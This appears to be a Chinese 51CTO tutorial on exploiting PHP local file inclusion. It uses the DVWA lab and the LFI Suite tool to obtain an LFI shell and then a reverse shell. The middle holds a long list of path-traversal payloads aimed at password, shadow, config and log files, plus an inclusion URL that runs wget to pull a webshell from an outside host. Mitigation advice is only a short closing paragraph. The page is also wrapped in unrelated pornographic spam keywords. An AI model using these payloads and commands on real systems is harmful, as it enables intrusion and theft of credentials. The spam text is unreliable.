精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

如何有效規避本地文件包含簡單利用的漏洞攻擊

原創
安全 漏洞
本文主要是對文件包含做了一個簡單的介紹,如文件包含漏洞的簡單原理及危害,最重要的是對本地文件包含漏洞的進一步利用,通過本地文件包含漏洞,從而獲取到一個反向連接或者是LFI shell。通過本文也讓自己對本地文件包含的危害和利用都有了一定的提高,不在是只停留在讀取文件上!

【51CTO.com原創稿件】今天在公眾號看到了一個本地文件包含的利用工具,看了下國外大牛對該工具的使用的一個視頻,感覺很厲害,通過該工具可對存在本地文件包含漏洞的站點進行利用并返回一個LFI shell,通過返回的LFI shell再次獲取一個反向連接,從而可執行相關命令,以前對本地文件包含的利用大多都停留在讀取文件,如果有遠程文件包含的話就可以getshell。

這篇文章主要是對本地文件包含的一個簡單介紹及利用,主要是對工具的使用,也主要是記錄下該過程,方便以后查看,然后再抽時間研究下大神源代碼!大神請繞道而行!: )

0x01 文件包含漏洞原理

文件包含漏洞主要是程序員把一些公用的代碼寫在一個單獨的文件中,然后使用其他文件進行包含調用,如果需要包含的文件使用硬編碼,一般是不會出現安全問題,但是有時可能不確定需要包含哪些具體文件,所以就會采用變量的形式來傳遞需要包含的文件,但是在使用包含文件的過程中,未對包含的變量進行檢查及過濾,導致外部提交的惡意數據作為變量進入到了文件包含的過程中,從而導致提交的惡意數據被執行。

文件包含通常分為本地文件包含(Local File Inclusion)和遠程文件包含(Remote File Inclusion)。allow_url_fopen和 allow_url_include為0n的情況認為是遠程文件包含漏洞,allow_url_fopen為off和 allow_url_include為0n為本地文件包含漏洞,如圖1 配置文件所示。本次主要是利用本地文件包含,所以將allow_url_fopen設置為了off。

圖1 php.ini配置

另外,文件包含漏洞主要涉及到的危險函數有四個:include(),require()和include_once(),require_once()。

include():執行到include時才包含文件,找不到被包含文件時只會產生警告,腳本將繼續執行。

require():只要程序一運行就包含文件,找不到被包含的文件時會產生致命錯誤,并停止腳本。

include_once()和require_once():若文件中代碼已被包含則不會再次包含。(來自簡書)

0x02 文件包含漏洞危害

通過文件包含漏洞,可以讀取系統中的敏感文件,源代碼文件等,如密碼文件,通過對密碼文件進行暴力破解,若破解成功則可獲取操作系統的用戶賬戶,甚至可通過開放的遠程連接服務進行連接控制;另外文件包含漏洞還可能導致執行任意代碼,不管本地文件包含還是遠程文件包含!

常見的利用方法有以下三點:

一、讀取目標主機上的其他文件,主要是本地文件包含。

二、包含可運行的網頁木馬,主要是遠程文件包含,前提是"allow_url_fopen"是激活的(默認是激活的,沒幾個人會修改)。

三、包含一個創建文件的相應代碼文件,因為通過文件包含漏洞獲取的shell不是長久的,如果這個漏洞修補了,那么shell也就不存在了,因此需要創建一個真實的shell。我們可以先包含一個可以執行cmd的偽shell,然后使用wget加-O參數(類似:

http://x.x.x.x/index.php?page=http://www.1ster.cn/cmd.txt?cmd=wget http://x.x.x.x/muma.txt -O muma.php)獲取一個真正的webshell。如果系統中沒有wget命令,獲取目錄不可寫,那么我們可以包含一個創建文件的腳本,然后通過腳本上傳木馬文件。

除了以上三點外,應該還有一點就是執行任意命令!

0x03 實驗環境

本次實驗環境主要是利用dvwa平臺進行演示,如圖2所示。DVWA(Damn Vulnerable Web Application)是用PHP+MySQL編寫的一套Web漏洞平臺,說簡單點就是所謂的網站漏洞靶機,該平臺包含了SQL注入、XSS、本地文件包含、命令執行等一些常見的Web安全漏洞,并且該平臺是開源的,可以從官網直接下載。

圖2 dvwa平臺

0x04 本地文件包含利用工具

本次主要使用的是LFI SUIT本地文件包含利用工具,是一款用Python2.7編寫的神器,適用于Windows,Linux和OS X,并且首次使用會自動配置,自動安裝需要的模塊,該工具提供了九種不同的文件包含攻擊模塊,如圖3所示。

另外當你通過一個可利用的攻擊獲取到一個LFI shell后,你可以通過輸入“reverseshell”命令輕易地獲得一個反向shell。但是前提是你必須讓你的系統監聽反向連接,比如使用“nc –lvp port”。

圖3 九種不同的文件包含攻擊模塊

0x05 本地文件包含讀取文件

在之前的本地文件包含漏洞中,大多數都是進行讀取文件,如Linux下的密碼文件(../../../../etc/shadow以及../../../../etc/passwd),獲取并讀取一些你知道物理路徑的一些文件,如圖4所示。

圖4 讀取已知路徑下的文件

以下是一些簡單的測試用例,根據實際情況進行適當的修改。

../../tomcat/conf/tomcat-users.xml

../

%2e%2e%2f which translates to ../

%2e%2e/ which translates to ../

..%2f which translates to ../

%2e%2e%5c which translates to ..\

%c1%1c

%c0%9v

%c0%af

..%5c../

../../../../../../../../../../../../etc/hosts%00

../../../../../../../../../../../../etc/hosts

../../boot.ini

/../../../../../../../../%2A

../../../../../../../../../../../../etc/passwd%00

../../../../../../../../../../../../etc/passwd

../../../../../../../../../../../../etc/shadow%00

../../../../../../../../../../../../etc/shadow

/../../../../../../../../../../etc/passwd^^

/../../../../../../../../../../etc/shadow^^

/../../../../../../../../../../etc/passwd

/../../../../../../../../../../etc/shadow

/./././././././././././etc/passwd

/./././././././././././etc/shadow

\..\..\..\..\..\..\..\..\..\..\etc\passwd

\..\..\..\..\..\..\..\..\..\..\etc\shadow

..\..\..\..\..\..\..\..\..\..\etc\passwd

..\..\..\..\..\..\..\..\..\..\etc\shadow

/..\../..\../..\../..\../..\../..\../etc/passwd

/..\../..\../..\../..\../..\../..\../etc/shadow

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow

\..\..\..\..\..\..\..\..\..\..\etc\passwd%00

\..\..\..\..\..\..\..\..\..\..\etc\shadow%00

..\..\..\..\..\..\..\..\..\..\etc\passwd%00

..\..\..\..\..\..\..\..\..\..\etc\shadow%00

%0a/bin/cat%20/etc/passwd

%0a/bin/cat%20/etc/shadow

%00/etc/passwd%00

%00/etc/shadow%00

%00../../../../../../etc/passwd

%00../../../../../../etc/shadow

/../../../../../../../../../../../etc/passwd%00.jpg

/../../../../../../../../../../../etc/passwd%00.html

/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd

/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00

/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini

/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini

\\'/bin/cat%20/etc/passwd\\'

\\'/bin/cat%20/etc/shadow\\'

../../../../../../../../conf/server.xml

/../../../../../../../../bin/id|

C:/inetpub/wwwroot/global.asa

C:\inetpub\wwwroot\global.asa

C:/boot.ini

C:\boot.ini

../../../../../../../../../../../../localstart.asp%00

../../../../../../../../../../../../localstart.asp

../../../../../../../../../../../../boot.ini%00

../../../../../../../../../../../../boot.ini

/./././././././././././boot.ini

/../../../../../../../../../../../boot.ini%00

/../../../../../../../../../../../boot.ini

/..\../..\../..\../..\../..\../..\../boot.ini

/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini

\..\..\..\..\..\..\..\..\..\..\boot.ini

..\..\..\..\..\..\..\..\..\..\boot.ini%00

..\..\..\..\..\..\..\..\..\..\boot.ini

/../../../../../../../../../../../boot.ini%00.html

/../../../../../../../../../../../boot.ini%00.jpg

/.../.../.../.../.../

..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bo

../../../../../../../../../../var/log/httpd/access_log

../../../../../../../../../../var/log/httpd/error_log

../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

../../../../../../../../../../etc/httpd/logs/acces_log

../../../../../../../../../../etc/httpd/logs/acces.log

../../../../../../../../../../etc/httpd/logs/error_log

../../../../../../../../../../etc/httpd/logs/error.log

../../../../../../../../../../var/www/logs/access_log

../../../../../../../../../../var/www/logs/access.log

../../../../../../../../../../usr/local/apache/logs/access_log

../../../../../../../../../../usr/local/apache/logs/access.log

../../../../../../../../../../var/log/apache/access_log

../../../../../../../../../../var/log/apache/access.log

../../../../../../../../../../var/log/access_log

../../../../../../../../../../var/www/logs/error_log

../../../../../../../../../../var/www/logs/error.log

../../../../../../../../../../usr/local/apache/logs/error_log

../../../../../../../../../../usr/local/apache/logs/error.log

../../../../../../../../../../var/log/apache/error_log

../../../../../../../../../../var/log/apache/error.log

../../../../../../../../../../var/log/access_log

../../../../../../../../../../var/log/error_log

/var/log/httpd/access_log

/var/log/httpd/error_log

../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

/etc/httpd/logs/acces_log

/etc/httpd/logs/acces.log

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/var/www/logs/access_log

/var/www/logs/access.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/var/log/apache/access_log

/var/log/apache/access.log

/var/log/access_log

/var/www/logs/error_log

/var/www/logs/error.log

/usr/local/apache/logs/error_log

/usr/local/apache/logs/error.log

/var/log/apache/error_log

/var/log/apache/error.log

/var/log/access_log

/var/log/error_log

../../../WEB-INF/web.xml

0x06 神器簡單獲取LFI shell

運行LFI SUIT工具及選擇攻擊模塊

直接使用python lfisuite.py,如圖5所示。此時我們選擇利用功能模塊1。

圖5 運行本地文件包含利用工具

設置cookie

在我們選擇利用功能模塊1后,會提示讓我們輸入cookie,如圖6所示:

圖6 設置cookie

獲取cookie

瀏覽器F12console輸入document.cookie即可獲取到當前cookie,如圖7所示。

圖7 獲取cookie

成功獲取LFI shell

輸入cookie后,我們隨便選擇一個攻擊模塊試試,在此我們選擇3,選取攻擊模塊后,我們輸入漏洞地址即可成功獲取到一個shell,如圖8所示。

圖8 成功獲取LFI shell

0x07 自動模塊獲取lfi shell

如果我們不知道那個攻擊模塊可以返回shell,我們可以選擇自動攻擊模塊。

圖9 自動攻擊模塊

選擇之后,我們需要選擇一個包含路徑的文件,我們選擇當前目錄下的一個文件即可。

圖10 選擇文件

選擇文件后,該工具會嘗試可能性的路徑,并且加以利用。

圖11 選擇文件

如圖12所示,我們成功獲取了一個shell。

圖12 成功獲取shell

0x08 獲取一個反向連接

在我們已經獲取到lfi shell后,我們可以使用reverseshell來獲取一個反向連接,我們先進行監聽反向連接,如圖13所示。

圖13 設置監聽反向連接

我們輸入reverseshell后,設置IP即可

圖14 設置ip及端口

此時,我們也成功獲取到了一個反向連接,如圖15所示。

圖15 獲取到反向連接

0x09 掃描模塊

另外,我們也可以先使用掃描模塊,然后在選擇對應的攻擊模塊也能成功獲取到LFI shell。使用方法與上面都是一樣的,再次就不再進行描述了。

0x10 總結與修復

本文主要是對文件包含做了一個簡單的介紹,如文件包含漏洞的簡單原理及危害,最重要的是對本地文件包含漏洞的進一步利用,通過本地文件包含漏洞,從而獲取到一個反向連接或者是LFI shell。通過本文也讓自己對本地文件包含的危害和利用都有了一定的提高,不在是只停留在讀取文件上!

通過對該漏洞的利用,最安全的是設置allow_url_fopen和 allow_url_include為0ff,這樣就不能利用該漏洞了,另一方面可以做白名單限制,相當于是硬編碼,直接把需要包含的文件固定死,這樣既不會影響業務,也不會很輕松被利用,其次還是要對用戶的輸入保持懷疑態度,對用戶的輸入變量進行嚴格的檢查及過濾! 

【51CTO原創稿件,合作站點轉載請注明原文作者和出處為51CTO.com】

責任編輯:龐桂玉 來源: 51CTO.com
相關推薦

2025-02-21 08:10:00

漏洞網絡安全網絡攻擊

2021-11-08 07:26:36

Vailyn漏洞安全工具

2014-02-25 09:29:41

2011-03-18 10:23:27

2009-07-06 17:47:44

2015-04-02 16:26:39

漏洞檢測工具Kadimus

2010-09-08 17:11:32

2010-07-28 16:40:38

2013-02-22 15:41:47

2010-09-08 16:23:22

2009-04-06 07:06:39

2014-05-28 10:16:11

2010-09-08 16:09:02

2009-04-20 09:36:33

2020-12-30 09:27:55

漏洞DDoS攻擊網絡攻擊

2023-12-26 16:29:15

2013-05-06 10:42:52

2021-09-26 05:32:58

漏洞OperaXSS

2011-12-16 13:45:22

2015-08-17 15:10:11

漏洞檢測安全工具LFI scanner
點贊
收藏

51CTO技術棧公眾號

国产精品国产三级国产aⅴ中文 | 久久综合综合久久| 亚洲精品观看| 色综合久久天天综合网| 色婷婷精品国产一区二区三区| 6—12呦国产精品| 欧美日韩精品免费观看视频完整| 亚洲国产精品va在线看黑人 | 亚洲欧美日韩国产成人综合一二三区| 国产一区二区三区三州| 日韩一级不卡| xxav国产精品美女主播| 污污内射在线观看一区二区少妇 | 日韩欧美成人区| 日本福利视频导航| 婷婷综合激情网| 久久99精品网久久| 91精品国产99| 极品魔鬼身材女神啪啪精品| 国产精品久久久久av蜜臀| 欧美色综合天天久久综合精品| 久久久久久久香蕉| 在线观看免费黄色| 99久免费精品视频在线观看 | 国产精品乱战久久久| 欧美综合一区二区| 亚洲熟妇无码一区二区三区| 免费超碰在线| 国产欧美日韩视频在线观看| 国产一级二级三级精品| 国产乱码一区二区| 日韩电影在线免费| 91国语精品自产拍在线观看性色 | 国产三级在线看| 不卡视频在线看| 91影院在线免费观看视频| 香蕉影院在线观看| 日韩一区二区免费看| 另类色图亚洲色图| 黄色激情小视频| 国产日产精品一区二区三区四区的观看方式 | 蜜桃av鲁一鲁一鲁一鲁俄罗斯的| 美女任你摸久久| 国产精品91一区| 久久久久99精品成人片三人毛片| 亚洲无线视频| 欧美精品激情在线观看| 丰满少妇被猛烈进入一区二区| 久久成人综合| 日韩中文字幕网| 中文字幕91视频| 清纯唯美亚洲综合一区| 亚洲丝袜在线视频| 亚洲国产日韩一区无码精品久久久| 欧美激情极品| 日韩av在线网址| 日韩精品卡通动漫网站| 欧美wwwsss9999| 日韩av综合中文字幕| 日本一级片在线播放| 国产精品高潮呻吟久久久久| 欧美精品一区二区三区高清aⅴ| 乳色吐息在线观看| 精品久久久久久久久久岛国gif| 欧美福利电影网| 能看毛片的网站| 亚洲国产一区二区三区网站| 日韩欧美一二三区| 久久免费精品国产| 综合亚洲色图| 在线观看精品自拍私拍| 成人无码精品1区2区3区免费看| 99精品视频精品精品视频| 久久精品2019中文字幕| 免费在线观看av网址| 好看的亚洲午夜视频在线| 性金发美女69hd大尺寸| 九九热在线免费观看| 蜜桃久久av| 国产主播欧美精品| www.色日本| 99久久精品国产观看| 日本一区二区三区免费观看| 在线看黄色av| 亚洲高清免费观看高清完整版在线观看| 免费看毛片的网址| 户外露出一区二区三区| 欧美精三区欧美精三区| aaaaa黄色片| 少妇高潮一区二区三区| 色妞欧美日韩在线| 国产一级特黄毛片| 日韩国产精品久久久| 亚洲bt天天射| 青青草在线视频免费观看| 国产精品区一区二区三区| 国产 欧美 日本| 日韩视频网站在线观看| 欧美电影一区二区| 亚洲精品乱码久久| 欧美高清视频在线观看mv| 久久久久国产精品免费网站| 亚洲图片欧美日韩| 国产精品99久久久| 欧美精品一区二区三区在线四季 | 国产精品99一区| 国产精选久久久| 久久婷婷一区二区三区| 在线无限看免费粉色视频| 第一福利在线视频| 欧美二区三区的天堂| 中文字幕一二三四区| 亚洲澳门在线| 国产精品福利观看| 日韩中文字幕观看| 亚洲人成7777| 国产精品入口免费软件| 国产成人tv| 久久综合网hezyo| 日本免费精品视频| 成人高清视频免费观看| 在线亚洲美日韩| 色老太综合网| 日韩成人中文电影| 国产一级做a爰片在线看免费| 免费成人在线观看| 欧美久久久久久| 九九精品调教| 91精品国产综合久久久久久| 黄色片在线观看免费| 香蕉成人久久| 精品国产免费人成电影在线观... 精品国产免费久久久久久尖叫 | 一区二区三区欧美在线| 精精国产xxx在线视频app| 日韩精品一区二区三区四区视频 | 亚洲国产一区在线观看| 国产免费中文字幕| 区一区二视频| 国产99在线|中文| 可以免费看污视频的网站在线| 午夜精品久久久久久久久久久 | 国产欧美日韩激情| 欧美一区二区三区爽大粗免费| 视频一区在线| 欧美区二区三区| www.黄色小说.com| 亚洲精品高清视频在线观看| 超碰在线资源站| 91综合在线| 成人在线视频网站| 黄色免费在线网站| 3atv一区二区三区| 我要看黄色一级片| 国产自产v一区二区三区c| 亚洲欧美丝袜| 精品99re| 欧美激情国内偷拍| 欧美综合视频在线| 天天影视涩香欲综合网| 在线观看av中文字幕| 国产日产高清欧美一区二区三区| 久久国产精品久久| 巨茎人妖videos另类| 亚洲午夜女主播在线直播| 69亚洲精品久久久蜜桃小说| 欧美经典一区二区| www.久久91| 自拍偷拍欧美专区| 高清视频一区二区三区| aaa在线播放视频| 亚洲欧美在线免费| 一区二区视频免费观看| 亚洲欧洲三级电影| 国产a级片视频| 在线视频日韩| 少妇特黄a一区二区三区| 久久久加勒比| 欧美精品在线看| 天天摸天天干天天操| 精品日韩美女的视频高清 | 亚洲人成网站色在线观看| 特黄特色免费视频| 久久xxxx精品视频| 亚洲一区二区三区涩| 免费观看亚洲天堂| 欧美综合第一页| 欧美性猛交xxx乱大交3蜜桃| 日韩欧美成人激情| 欧产日产国产69| 亚洲欧洲国产日本综合| 88av在线播放| 免费看欧美美女黄的网站| 亚洲小视频在线播放| 久久综合五月婷婷| 国产精品视频专区| mm视频在线视频| xvideos亚洲| 爽爽视频在线观看| 日韩欧美一区中文| 中文字幕在线看人| 亚洲精品一二三| 久久精品国产亚洲AV熟女| 国产一区视频网站| avav在线看| 欧美大片一区| 日本一区二区在线| 红杏一区二区三区| 成人激情黄色网| 都市激情亚洲一区| 欧美精品video| 蜜芽在线免费观看| 日韩精品在线播放| 亚洲精品成人电影| 欧美精品一二三四| 天天干天天色综合| 午夜精品福利一区二区三区av | 精品欧美色视频网站在线观看| 亚洲精品国产精品久久清纯直播| 国产精品久久久久久免费播放| 婷婷六月综合亚洲| 538精品在线视频| 国产精品理伦片| 波多野结衣 在线| 成人黄色国产精品网站大全在线免费观看| 欧美午夜aaaaaa免费视频| 9色精品在线| 国产精品久久国产| 99久精品视频在线观看视频| 日本10禁啪啪无遮挡免费一区二区| 国产精品一区二区中文字幕 | 国产av无码专区亚洲a∨毛片| 欧洲在线/亚洲| av大片免费观看| 午夜影视日本亚洲欧洲精品| 日本青青草视频| 亚洲视频你懂的| 国产精品夜夜夜爽阿娇| 欧美激情中文不卡| 女女互磨互喷水高潮les呻吟| av福利精品导航| 五月天丁香社区| 成人久久18免费网站麻豆| gogo亚洲国模私拍人体| 国产一区二区免费在线| 中文字幕剧情在线观看| 久99久精品视频免费观看| 特级丰满少妇一级| 奇米色777欧美一区二区| 亚洲 欧美 日韩系列| 日韩国产成人精品| 九热视频在线观看| 日本三级亚洲精品| 高清一区在线观看| 免费视频最近日韩| 爱爱爱爱免费视频| 国产一区三区三区| 波多野结衣免费观看| 国产裸体歌舞团一区二区| 手机免费看av网站| 国产精品一区二区久久不卡| 日韩精品xxx| 白白色 亚洲乱淫| 国产三级视频网站| 国产午夜精品在线观看| 国内精品卡一卡二卡三| 国产精品嫩草影院com| 911国产在线| 亚洲精品成人少妇| 国产一级片视频| 欧美性生活大片免费观看网址| 无码一区二区三区| 7777精品伊人久久久大香线蕉 | 手机在线看片1024| 在线视频国内自拍亚洲视频| 一卡二卡三卡在线| 精品人在线二区三区| 无码国产精品高潮久久99| 国产一区二区三区网站| 日本暖暖在线视频| 国产+人+亚洲| 91福利精品在线观看| 亚洲一区二区三区久久| 美腿丝袜亚洲图片| 亚洲高清在线播放| 国内揄拍国内精品久久| 亚洲国产精品久久久久爰色欲| 美女视频一区在线观看| 图片区偷拍区小说区| 久久久www成人免费毛片麻豆| 美女三级黄色片| 亚洲.国产.中文慕字在线| 亚洲国产成人精品女人久久| 91麻豆精品国产自产在线观看一区| 免费观看成年人视频| 一级做a爰片久久毛片美女图片| av网站在线免费| 日韩美女福利视频| 福利一区三区| 欧美一区2区三区4区公司二百| 欧美成人嫩草网站| 天天碰免费视频| 成人中文字幕合集| 亚洲 欧美 国产 另类| 狠狠干狠狠久久| 精品国自产在线观看| 亚洲人成在线一二| 欧洲精品二区| 国产欧美精品一区二区三区介绍| 欧美成人基地| 国产成人三级视频| 日韩中文字幕麻豆| 李丽珍裸体午夜理伦片| 亚洲桃色在线一区| 久久久久久无码精品大片| 欧美成人免费网站| 日本韩国在线视频爽| 欧美有码在线视频| 伊人久久大香线蕉av超碰| 亚洲欧洲精品一区二区| 亚洲影院免费| 野战少妇38p| 亚洲精选一二三| 91福利在线观看视频| 亚洲天堂成人在线| 欧美裸体视频| 国产精品我不卡| 午夜日韩av| 一二三级黄色片| 国产精品日日摸夜夜摸av| 欧美黄色一级大片| 亚洲男人第一网站| 狠狠操一区二区三区| 岛国视频一区| 欧美三级网页| 97人人模人人爽人人澡| 中文字幕中文字幕中文字幕亚洲无线 | 韩国中文字幕2020精品| 97热在线精品视频在线观看| 在线播放一区二区精品视频| 黄色一级视频播放| 国内国产精品久久| www.99re6| 欧美日本精品一区二区三区| h网站视频在线观看| 国产精品久久久久av免费| 你懂的一区二区三区| 精品国产免费av| 91在线视频观看| 日本免费观看视| 日韩成人激情在线| a日韩av网址| 欧美日韩精品一二三区| 15—17女人毛片| 91欧美一区二区| youjizz在线视频| 亚洲网站视频福利| 成人激情视屏| 中文字幕成人一区| 国产伦精品一区二区三区免费| 欧美做爰啪啪xxxⅹ性| 欧美一区日本一区韩国一区| av电影高清在线观看| 亚洲最大av在线| 亚洲日本免费| 日韩精品无码一区二区三区久久久| 色综合久久久久久久| 国产爆初菊在线观看免费视频网站| 国产精品av在线播放| 99久久久久国产精品| 成年人性生活视频| 婷婷久久综合九色国产成人| 九色在线免费| 成人免费看黄网站| 伊人久久大香线蕉av超碰演员| 99re久久精品国产| 色综合久久综合网欧美综合网| av电影在线观看一区二区三区| 成人激情综合网| aa国产精品| av永久免费观看| 日韩午夜三级在线| mm视频在线视频| 伊人久久大香线蕉综合75| 久久久精品网| 在线看的片片片免费| 亚洲精品国产福利| 欧美特黄色片| 五十路熟女丰满大屁股| 国产校园另类小说区| 国产亲伦免费视频播放| 7777kkkk成人观看| 91久久夜色精品国产按摩| 精品人妻伦一二三区久| 欧美偷拍一区二区| 欧美性爽视频| 色播亚洲婷婷| 99久久精品国产精品久久| 一区二区www| 69影院欧美专区视频| 亚洲精品91|